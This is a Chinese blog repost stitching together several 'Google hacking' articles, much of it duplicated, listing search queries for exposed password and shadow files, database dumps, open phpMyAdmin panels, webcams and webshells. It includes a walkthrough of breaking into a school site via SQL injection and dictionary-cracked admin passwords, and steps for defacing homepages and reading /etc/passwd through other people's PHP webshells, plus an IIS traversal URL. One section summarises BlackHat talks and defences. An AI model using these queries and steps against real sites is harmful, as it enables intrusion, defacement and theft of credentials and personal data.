google 搜搜技巧

来源:互联网 发布:报喜鸟 男装 知乎 编辑:程序博客网 时间:2024/06/10 00:24

工作上用到search,拿出来复习复习。

google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其实并非如此简单...
JavaScript
常用的google关键字:
foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)
operator:foo
filetype:123 类型
site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息
intext:foo
intitle: fooltitle 标题哦
allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)
links:foo 不要说就知道是它的相关链接
allintilte:foo.com

我们可以辅助"-""+"来调整搜索的精确程度

直接搜索密码:(引号表示为精确搜索)
当然我们可以再延伸到上面的结果里进行二次搜索
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等

越来越有意思了,再来点更敏感信息
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPage的关键索引啦,扫描器的CGI库一般都有地)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc的端口)或者desktop port等多个关键字检索
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell

foo.org filetype:inc

ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) 说白了就是说,可以直接试着查查数据库检索,针对目前流行的sql注射,会发达哦
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified 直接搜索军方相关word

检查多个关键字:
intitle:config confixx login password

"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"

google缓存利用(hoho,最有影响力的东西)推荐大家搜索时候多"选搜索所有网站"
特别推荐:administrator users 等相关的东西,比如名字,生日等……最惨也可以拿来做字典嘛



……

一些技巧集合:

1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://*:*@www" domainname
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) orA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf

NO2:
--------------------------------------------------------------------------------

google hacking的简单实现
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.

intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网

页.同理allintitle:也同intitle类似.

cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.

define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.

filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入

:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)

info:
查找指定站点的一些基本信息.

inurl:
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接http://www.xxx.com/xxx/admin,用来找管理员登

陆的URL不错.allinurl也同inurl类似,可指定多个字符.

link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.

site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.

对了还有一些*作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询

下面开始说说实际应用

以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会

把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的

同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行*作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database

还http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winntsystem32

前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台.

利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没

site:xxxx.com filetype:doc
得到N个不错的doc。

先找找网站的管理后台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp

还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛
a3服务器也是IIS,aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,back a shell不太喜

欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名+

电话一类的变形,用google搞定吧。
site:xxxx.com //得到N个二级域名
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的
site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:
name:网站管理员
pass:a2xxxx7619//说了吧,就是域名+4个数字
要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。

这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠

个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面,一个intitle:indexof就差不多都出来了:)
1.查找利用php webshell

intitle:"php shell*" "Enable stderr" filetype:php

(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执

行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明

的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填

写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:

echo "召唤"> index.jsp

现在看看首页,已经被我们改成: "召唤" 了。

我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后executeCommand输入 cat file> index.html or echo "" > file

echo "test" >> file

这样一条条打出来,站点首页就成功被替换了。同样的也可以

uname -a;cat /etc/passwd

不过有点要注意,有些WEBSHELL程序有问题,执行不了的,

2.搜索INC敏感信息

在google的搜索框中填入:

Code:

.org filetype:inc

 

 

 

 

 

 

 

 

 

 

 

google入侵语法整理

 

文章转载自网管网:http://www.bitscn.com/plus/view.php?aid=29378

来源:http://www.cnsu.org

http://www.cnsu.org-->site

www.cnsu.org-->inurl

adminàinurl

.asp ――》filetype

标题――》intitle

页面文字――》intext

页面编号――》numeange

- 逻辑非,“A-B”表示包含A没有B的网页

*代表单个字符

| or操作

“”用短语做关键字,必须加上引号,不然会被当作与操作

.空格

Google对一些网路上出现频率极高的英文单词,如“i”、“com”、“www”等,以及一些符号如“*”、“.”等,作忽略处理

可以用+强制搜索

下面的语句是我搜集来的,大家可以试着用下

比如用Intitle:welcome.to.iis.4.0IIS4会找到好多winNT的主机,呵呵

Site:sohu.com

Site:sohu.com-site:www.sohu.com

Intitle:index.of/admin

Intitle:index.ofapache server.at

Intitle:test.page.for.apache“it workd”

Allintitle:NetscapeFasr Track Server Home Page

Intitle:”welcometo windows 2000 internet services”

IIS—win2000

Allintitle:welcometo windows XP server internet

services iis---XP

Intitle:welcome.to.iis.4.0IIS4

Allintrtle:”welcometo internet information server”

IIS-- generic

Intitle:”apachehttp server”

Intitle:”documentation”

Intitle:””errorusing hypernews””server software”

“HTTP_USER_AGENT=Googlebot”

“HTTP_USER_AGENT=Googlebot”TNS_ADMIN

Inurl:/admin/login.asp

Intitle:”remotedesktop wen connection”

“welcome to*” “Your password is *”

Inurl(browse|top_rated|power_search|hot|create_admin_user)+”powered

by inde xu”

“adding newuser” inurl:addnewuser –“there are no

domain”

Filetype:loginurl:”password.log”

Intitle:”PHP Shell*” “enable stderr” filetype:php

Intitle:confixxlogin password

“powered byrover”

Inurl:iisadmpwd

Inurl:5800

“VNCdesktop” inurl:5800

Inurl:webmininurl:10000

Inurl:8080–intext:8080

“accessdenird for user” “using password”

“# Dumpingdata for table”

“# Dumpingdata for table” username password

“# Dumpingdata for table

(username|user|users|password)”

Inurl:main.phpwelcome to phpmyadmin

Intitle:”phpmyadminrunning on *” welcome to phpmyadmin

Filetype:incintext:mysql connect

Filetype:sql +“INENTIFIED BY” –cvs

Filetype:sql +“INENTIFIED BY” (“grant * on *” | “create

user”)

“this reportlists” “identified by internet scaner”

ACID “by romandanyliw” Filetype:PHP

 

文章转载自网管网:http://www.bitscn.com/plus/view.php?aid=29378

 

 

 

 在google已经成为搜索引擎代名词的今天,聪明的人们不断发掘google的新用途,2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google ? 和google attacks 的主题演讲。个人觉得颇为精彩,因此编译整理,简单介绍,不求甚解,只是希望能够引起大家的重视。

  1. 观点

  google及类似的搜索引擎在为人们提供大量便捷的同时,也带来了一定潜在风险。

  网络中的“有心人士”数目众多;

  利用搜索引擎能够快速查找存在脆弱性的主机及其它设备;

  利用搜索引擎能够快速查找包含敏感数据的信息;

  利用搜索引擎的“扫描”极其隐蔽,并且由于其具有archive、cache等功能,往往数据量更大。

  因此,需要人们提高警觉性,在善用搜索引擎的同时,也善于保护自己。

  2. 案例

  2.1 基础

所谓“工欲善其事,必先利其器”,要用google来进行“渗透测试”,首先当然要深入了解google了,建议对google不甚了解的人先参考这篇Google搜索从入门到精通。而后简单了解google的一些操作符,如:site、inurl、filetype、intitle等……

 

  2.2 演示

  要做的演示并不复杂,渗透测试人员在实施攻击之前,往往会先进行信息搜集工作,而后才是漏洞确认和最终的漏洞利用、扩大战果。在这里我们的目标是:通过google查找被人安装了phpwebshell后门的主机,并测试能否使用。

  我们在google的搜索框中填入:
intitle:"php shell*""Enable stderr" filetype:php

搜索结果中,或许你能找到一两够直接在机器上执行命令的web shell来。

 

  这是类似黑客工具的操作方式。在You found thaton google ? 中,你会看到大量的实际案例,google找到了大量的密码、信用卡帐号、网络管理信息等等……

  2.3 工具

  对攻与防两边来说,自动化的工具都是可以提高效率的,这里介绍几款工具:

gooscan 用来处理搜索结果的一个小命令行程序,能够一定程度上减轻查询google时的“体力劳动”负担。界面如下:

 

sitedigger 这是FoundStone出品的一款免费软件,代用了google的api接口,使用者需要先到googleapi网站注册帐号获取一个许可字串后,才可以正常使用。使用前建议先自动连接到网络更新规则库,SiteDigger的规则库包含了七大类规则,分类详细,是一款相当不错的小产品。你也可以先参考它的白皮书。

 

athena 与SiteDigger类似,是一款借助搜索引擎来查找信息被误用或滥用的工具,支持多搜索引擎。

 

  3. 解决

  3.1 我们该如何做?

  我们的资料如此容易被人所获取,那该采用什么方式来避开这种攻击或数据搜集呢?

  信息发布的严格审核与责任追查;

  利用相关工具进行在互联网进行搜索,如果有信息被滥用,到从google中删除网页记录提交你希望删除的信息;

  控制robots.txt,控制搜索引擎的机器人的查询。

  3.2 总结

还是以一幅FreeMind绘制的图片来结束这则短短的介绍吧:

 

 

 

利用google【谷歌】入侵

利用google【谷歌】入侵
察看基本情况:
info:xx.com 返回一些基本信息
site:xx.com 返回所有与该有关的url`````````````````````````````一般是看他的主要文件和部分目录
link:xx.com 返回所有与该站做了连接的站

site:xx.com filetype:txt 查找TXT文件 其他的依次内推``````TXT,有时候在站里面可以找到ftp密码

查找后台```````````````````````````````````````````````````````````拿到密码后,或者尝试or,或者看版权时用到
site:xx.com intext:管理
site:xx.com inurl:login
site:xx.com intitle:后台site:xx.com inurl::asp ------所有asp连接

查看服务器使用的程序``````````````````````````````````````````一般看主机什么系统,对应的马就什么权限
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx.com filetype:jsp
site:xx.com filetype:aspx

查看上传漏洞:``````````````````````````````````````````````````这可是最爽的拿shell方法
site:xx.com inurl:file
site:xx.com inurl:load

查找注射点:`````````````````````````````````````````````````````找注射点最快的方法
site:xx.com filetype:asp
以上语法可以复合使用


利用Google突破封锁:下载想要的东西

第一篇 突破封锁之电子书、多媒体下载

  在搜索框上输入:
   "index of/ " inurl:lib
  再按搜索你将进入许多图书馆,并且一定能下载自己喜欢的书籍。

  在搜索框上输入:
   "index of /" cnki
  再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口!

  在搜索框上输入:
  "index of /" ppt
  再按搜索你就可以突破网站入口下载powerpint作品!

  在搜索框上输入:
  "index of /" mp3
  再按搜索你就可以突破网站入口下载mp3、rm等影视作品!

  在搜索框上输入:
  "index of /" swf
  再按搜索你就可以突破网站入口下载flash作品!

  在搜索框上输入:
  "index of /" 要下载的软件名
  再按搜索你就可以突破网站入口下载软件!

  注意引号应是英文的!

  再透露一下,如果你输入:
  "index of /" AVI
  这样就可以下载AVI格式的视频文件了喔

  第二篇 突破封锁之看世界

  用Google看世界!!!只要你在Google里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!

  在google里输入:
  inurl:"viewerframe?mode="

  随便打开一个,然后按提示装一个插件,就可以看到了!!!

  第三篇 突破封锁之Google是黑客的乐园

  三则黑客的Google搜索技巧简介

  大家都知道,Google毫无疑问是当今世界上最强大的搜索引擎。然而,在黑客手中,它也是一个秘密武器,它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站,而是利用这些技巧去在浩如烟海的网络信息中,来个大海捞针,寻找到对您有用的信息。

  如果您是一名普通网民,您可以使用黑客的技巧扩大自己的视野,提高自己的检索效率;如果您是一名网管,请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施,如果没有就赶快来个亡羊补牢,毕竟隐患胜于明火,防范胜于救灾;如果您是一名黑客,相信您早以在别的黑客站点上见过类似的方法,这篇文章对您没什么用处,这里的技巧对您是小儿科,菜鸟级!您可以节省宝贵的时间做更有意义的事情,这篇文章您不用看了,到别处去吧!

 

现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多,但他们经常具备一些其他文件不具备的高质量信息

  为了显示一个搜索结果是 PDF 文件而不是网页, PDF 文件的标题开头显示蓝色文本。

  这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件

  如果你的计算机没装有该程序,计算机会指导你去能免费下载该程序的网页。

  使用 PDF 文件时,相关的网页快照会由“ TEXTVERSION ”代替,它是 PDF 文档的复制文件,该文件除去了所有格式化命令。

  如果你在没有 PDF 链接的情况下想看一系列搜索结果,只要在搜索栏中打上 -inurldf 加上你的搜索条件。

  3 、股票报价

  用 Google 查找股票和共有基金信息,只要输入一个或多个 NYSE , NASDAQ ,AMEX 或
  共有基金的股票行情自动收录机的代码,也可以输入在股市开户的公司名字。

  如果 Google 识别出你查询的是股票或者共有基金,它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。

  在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字(比如, INTEL),请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接(比如,www.INTEL.COM )。

  Google 是以质量为基础来选择和决定金融信息提供者的,包括的因素有下载速度,用户界面及其功能。

  4 、找找谁和你链接

  有些单词如果带有冒号就会有特殊的意思。比如 link :操作员。查询 link:siteURL ,就会显示所有指向那个 URL 的网页。举例来说,链接 www.Google.com 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。

  5 、查找站点

  单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是:在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如,在斯坦福找申请信息,输入:
  admission site:www.stanford.edu

  6 、查找字典释意

  查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线,位于搜索结果的上面,点击链接你会找到字典提供者根据要求给出的相关定义。

7 、用 GOOLGE 查找地图

  想用 Google 查找街区地图,在 Google 搜索栏中输入美国街区地址,包括邮递区号或城市/州(比如 165 大学大街 PALOALTO CA )。通常情况下,街区地址和城市的名字就足够了。

  当 Google 识别你的要求是查找地图,它会反馈给你有高质量地图提供者提供的链接,使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。


搜索URL

  比如我们提交这种形式:passwd.txt site:virtualave.net

  看到了什么?是不是觉得太不可思议了!有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的!管理员或许太不负责了,或许安全防范的意识太差了,如果你是网络管理员,赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密,即使我们的密码经过DES 加密的密码,黑客们还是可以通过许多破解软件来搞定。

  这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。

  同样,我们可以搜索一些顶级域名,比如:.net .org .jp .in .gr

  config.txt site:.jp

  admin.txt site:.tw

  搜索首页的目录

  首页是非常有用的,它会提供给你许多有用的信息。

  我们提交如下的形式:

  "Index of /admin"

  "Index of /secret"

  "Index of /cgi-bin" site:.edu

  你可以自己定义搜索的首页字符。这样就可以获得许多信息。

  搜索特定的文件类型

  比如你想指定一种文件的类型,可以提交如下形式:

  filetype:.doc site:.mil classified

  这个就是搜索军方的资料,你可以自定义搜索。

 

常用的google关键字:
foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)
operator:foo
filetype:123 类型
site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息
intext:foo
intitle: fooltitle 标题哦
allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)
links:foo 不要说就知道是它的相关链接
allintilte:foo.com


我们可以辅助"-" " "来调整搜索的精确程度

直接搜索密码:(引号表示为精确搜索)
当然我们可以再延伸到上面的结果里进行二次搜索
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等

越来越有意思了,再来点更敏感信息
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPage的关键索引啦,扫描器的CGI库一般都有地)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc的端口)或者desktopport等多个关键字检索
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell

foo.org filetype:inc


ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) 说白了就是说,可以直接试着查查数据库检索,针对目前流行的sql注射,会发达哦
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified 直接搜索军方相关word

检查多个关键字:
intitle:config confixx login password

"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"

google缓存利用(hoho,最有影响力的东西)推荐大家搜索时候多"选搜索所有网站"
特别推荐:administrator users 等相关的东西,比如名字,生日等……最惨也可以拿来做字典嘛


……


一些技巧集合:

1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://*:*@www" domainname
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) orA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf

 

 

google hacking的简单实现
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.

intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网

页.同理allintitle:也同intitle类似.

cache:
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.

define:
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.

filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入

:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)

info:
查找指定站点的一些基本信息.

inurl:
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接http://www.xxx.com/xxx/admin,用来找管理员登

陆的URL不错.allinurl也同inurl类似,可指定多个字符.

link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.

site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.


对了还有一些*作符也是很有用的:
把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询

下面开始说说实际应用

以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会

把一些敏感信息透露给他们.用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的


同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行*作.我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database

还http://www.xxx.com/_vti_bin/..%5 ...ystem32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32

 

前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apachewin32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台.


利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中,找到几个该校的几个系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没

site:xxxx.com filetype:doc
得到N个不错的doc。

先找找网站的管理后台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超过获得2个管理后台地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp

还算不错,看看服务器上跑的是什么程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛
a3服务器也是IIS,aspx asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
没找到什么有价值的东西。再看看有没有上传一类的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发现一个上传文件的页面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注射,
site:a2.xxxx.com filetype:asp
得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,back a shell不太喜

欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名

电话一类的变形,用google搞定吧。
site:xxxx.com //得到N个二级域名
site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的
site:xxxx.com intext:电话 //N个电话
把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:
name:网站管理员
pass:a2xxxx7619 //说了吧,就是域名 4个数字
要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。


这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠

个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑
apache的网管们应该多注意一下这方面,一个intitle:index of就差不多都出来了:)

 

1.查找利用php webshell

intitle:"php shell*" "Enable stderr" filetype:php

(注: intitle—网页标题 Enablestderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执

行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明

的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填

写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:


echo "召唤" > index.jsp


现在看看首页,已经被我们改成: "召唤" 了。

我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file

echo "test" >> file

这样一条条打出来,站点首页就成功被替换了。同样的也可以


uname -a;cat /etc/passwd

不过有点要注意,有些WEBSHELL程序有问题,执行不了的,

2.搜索INC敏感信息

在google的搜索框中填入:

Code:

.org filetype:inc


